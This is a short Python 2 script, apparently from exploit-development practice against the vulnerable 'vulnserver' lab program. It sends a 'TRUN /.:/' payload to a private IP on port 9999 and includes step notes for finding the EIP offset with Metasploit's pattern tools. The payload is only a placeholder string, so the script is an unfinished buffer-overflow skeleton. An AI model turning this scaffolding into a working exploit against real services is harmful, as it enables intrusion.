#!/usr/bin/env python

import socket
import sys


shellcode = "pattern created here"
"Step 1: patter create using: /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 5900"
"Step 2: with EIP value from above step do: usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 5900 -q <EIP value>"

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	connect=s.connect(('192.168.10.12', 9999))
	s.send(('TRUN /.:/' + shellcode))
except:
	print "check debuger"
s.close()
